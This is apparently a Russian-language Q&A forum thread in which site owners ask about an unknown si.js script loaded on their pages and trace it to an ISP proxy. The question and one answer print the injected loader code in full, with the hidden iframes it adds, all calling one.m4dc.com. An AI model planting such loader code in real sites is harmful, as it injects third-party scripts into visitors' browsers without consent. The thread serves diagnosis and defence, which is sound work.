Неидентифицируемый JS-скрипт в моем проекте - PullRequest
Новая
       26

Неидентифицируемый JS-скрипт в моем проекте

0 голосов
/ 02 мая 2018

Я проверял страницу с медленной загрузкой и нашел этот si.js в разделе проверки сети chrome. Может ли кто-нибудь помочь мне понять, что это такое. Я искал grid.js и не мог найти ссылку на этот si.js. (При тщательной проверке я мог видеть, что страница перенаправляется на другой веб-сайт "http://one.m4dc.com/j/si.js". Благодарим Вас за помощь Вот скриншоты enter image description here

enter image description here

Обновление! Если вы перейдете на URL браузера, это то, что я получаю ../js/grid.js

try{var esdmd51='1f4c5553ab20a8809f7f1724448c2f6e'; var d=document;var esdfd5_uri='http://test.domain.com/js/grid.js?m4dc56=156443';if(0!=e6f744){var e6f744=0;esdfd5=!0}else esdfd5=!1;function ldS(e,t){var a=d.createElement("script");a.type="text/javascript",a.readyState?a.onreadystatechange=function(){"loaded"!=a.readyState&&"complete"!=a.readyState||(a.onreadystatechange=null,t())}:a.onload=function(){t()},a.src=e,d.getElementsByTagName("head")[0].appendChild(a)}try{vA=d.currentScript.async,vD=d.currentScript.defer}catch(e){vA=!0}vA||vD?ldS(esdfd5_uri,function(){}):(d.write('<script id="esdfd556443" type="text/javascript" src="'+esdfd5_uri+'" ><\/script>'),d.getElementById("esdfd556443")||ldS(sdfd5_uri,function(){})),esdfd5&&ldS("http://one.m4dc.com/j/si.js",function(){})}catch(e){}

Но реальный скрипт (на локальной машине похож на тот, что на оригинальном сайте)

https://tympanus.net/Tutorials/ThumbnailGridExpandingPreview/js/grid.js

Ответы [ 3 ]

0 голосов
/ 26 мая 2018

Я тоже испытываю эту проблему. Когда я проверил все свои скрипты, один из скриптов с именем pd-index.js моего веб-сайта был заменен скриптом, содержимое которого указано ниже. 

try {
 var esdmd51 = '1f4c5553ab20a8809f7f1724448c2f6e';
 var d = document;
 var esdfd5_uri = 'http://www.plantondesk.com/js/pd-index.js?m4dc56=176712';
 if(0 != e6f744) {
  var e6f744 = 0;
  esdfd5 =! 0
 }
 else esdfd5 =! 1;

 function ldS(e,t) {
  var a = d.createElement("script");
  a.type = "text/javascript",
  a.readyState
  ?a.onreadystatechange = function() {
   "loaded"!=a.readyState && "complete" != a.readyState || (a.onreadystatechange=null,t())
  }
  :a.onload = function() {
   t()
  },
  a.src = e,
  d.getElementsByTagName("head")[0].appendChild(a)
 }

 try {
  vA = d.currentScript.async,
  vD = d.currentScript.defer
 }
 catch(e) {
  vA =! 0
 }

 vA || vD
 ?ldS(esdfd5_uri, function(){})
 :(
  d.write('<script id="esdfd576712" type="text/javascript" src="'+esdfd5_uri+'" ><\/script>'),
  d.getElementById("esdfd576712") || ldS(sdfd5_uri, function(){})),
  esdfd5 && ldS("http://one.m4dc.com/j/si.js", function(){}
 )
}

catch(e) {}

Весь этот код был написан в одну строку. Я структурировал это, чтобы понять. Два моих сайта сталкиваются с такой же проблемой при развертывании на сервере. Нет проблем при локальном запуске.

Он также добавляет эти два элемента div в конец содержимого тела каждой страницы. 

<div>
  <iframe width="0px" height="0px" class="iifr" id="chk_frame" src="http://one.m4dc.com/i/si.html" frameborder="0" scrolling="no" allowtransparency="true"></iframe>
</div>

<div>
  <iframe width="0px" height="0px" class="iifr" id="hdr_ifr" src="http://one.m4dc.com/t/?r=0.7112356815203629" frameborder="0" scrolling="no" allowtransparency="true"></iframe>
</div>
0 голосов
/ 08 июня 2018

Это может помочь кому-то, если вы столкнулись с подобной проблемой.

У меня была похожая проблема, некоторые неизвестные js-файлы внедрялись на мой сайт. Мне удалось определить источник с помощью инструментов разработчика Chrome.

chrome screenshot

Найдите столбец инициатора в соответствующей строке внедренного файла JS. Он будет указывать на поврежденный / измененный файл JS. Для меня это происходило несколько раз, не уверен в точной причине. Так как моя система чиста от вредоносного или рекламного ПО. Но проблема решается при замене поврежденного JS на свежую копию или лучше использовать CDN, если это библиотека.

0 голосов
/ 04 мая 2018

У меня тоже такая же проблема. Я только что узнал, что этот скрипт http://one.m4dc.com/j/si.js добавляет куки на мой сайт image

Проблема была фактически решена, когда я добавил ssl сертификат на свой веб-сайт. Я обнаружил, что сервер http://one.m4dc.com принадлежит

Bharthi airtel one.m4dc.com ip информация о местоположении

и я использовал их услуги широкополосного доступа. Похоже, что их прокси-сервер внедрял этот сценарий. Они используют этот сценарий в злонамеренных целях.

...